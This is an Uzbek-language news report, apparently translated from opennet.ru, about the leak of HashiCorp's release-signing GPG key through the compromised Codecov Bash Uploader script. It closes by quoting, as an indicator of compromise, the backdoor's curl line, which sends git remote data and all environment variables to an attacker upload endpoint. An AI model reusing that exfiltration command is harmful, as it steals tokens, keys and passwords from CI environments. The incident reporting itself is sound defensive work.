Vagrant, Packer, Nomad va Terraform ochiq manba vositalarini ishlab chiqish bilan tanilgan HashiCorp nashrlarni tasdiqlovchi raqamli imzolarni yaratish uchun foydalaniladigan shaxsiy GPG kalitining sizib chiqishini e'lon qildi. GPG kalitiga kirish huquqiga ega bo'lgan tajovuzkorlar HashiCorp mahsulotlarini to'g'ri raqamli imzo bilan tekshirish orqali ularga yashirin o'zgarishlar kiritishlari mumkin. Shu bilan birga, kompaniya audit davomida bunday o'zgartirishlar kiritishga urinishlar izlari aniqlanmaganini ta'kidladi.
Hozirda buzilgan GPG kaliti bekor qilindi va uning o'rniga yangi kalit joriy etildi. Muammo faqat SHA256SUM va SHA256SUM.sig fayllari yordamida tekshirishga taʼsir koʻrsatdi va releases.hashicorp.com orqali yetkazib beriladigan Linux DEB va RPM paketlari uchun raqamli imzolarni yaratishga, shuningdek, macOS va Windows (AuthentiCode) versiyalarini tekshirish mexanizmlariga taʼsir qilmadi. .
Oqish uzluksiz integratsiya tizimlaridan qamrov hisobotlarini yuklab olish uchun mo'ljallangan infratuzilmada Codecov Bash Uploader (codecov-bash) skriptidan foydalanish tufayli yuz berdi. Codecov kompaniyasiga hujum paytida, ko'rsatilgan skriptda orqa eshik yashiringan, u orqali parollar va shifrlash kalitlari tajovuzkorlar serveriga yuborilgan.
Buzilish uchun tajovuzkorlar Codecov Docker tasvirini yaratish jarayonida yuzaga kelgan xatolikdan foydalanishdi, bu ularga codecov.io saytidan tarqatilgan Bash Uploader skriptiga o‘zgartirish kiritish uchun zarur bo‘lgan GCS (Google Cloud Storage) ga kirish ma’lumotlarini olish imkonini berdi. veb-sayt. O'zgarishlar 31-yanvar kuni yana amalga oshirildi, ikki oy davomida aniqlanmadi va tajovuzkorlarga mijozlarning uzluksiz integratsiya tizimi muhitida saqlangan ma'lumotlarni olish imkonini berdi. Qo‘shilgan zararli koddan foydalanib, tajovuzkorlar sinovdan o‘tgan Git ombori va atrof-muhitning barcha o‘zgaruvchilari, jumladan, tokenlar, shifrlash kalitlari va Amazon Web Services va GitHub kabi ilovalar kodi, omborlari va xizmatlariga kirishni tashkil qilish uchun uzluksiz integratsiya tizimlariga uzatiladigan parollar haqida ma’lumot olishlari mumkin edi.
To'g'ridan-to'g'ri qo'ng'iroqdan tashqari, Codecov Bash Uploader skripti Codecov-action (Github), Codecov-circleci-orb va Codecov-bitrise-step kabi boshqa yuklovchilarning bir qismi sifatida ishlatilgan, ularning foydalanuvchilari ham muammodan ta'sirlangan. Codecov-bash va tegishli mahsulotlarning barcha foydalanuvchilariga o'z infratuzilmalarini tekshirish, shuningdek parollar va shifrlash kalitlarini o'zgartirish tavsiya etiladi. Skriptda orqa eshik mavjudligini curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” qatori mavjudligi bilan tekshirishingiz mumkin http:// /upload/v2 || rost
Manba: opennet.ru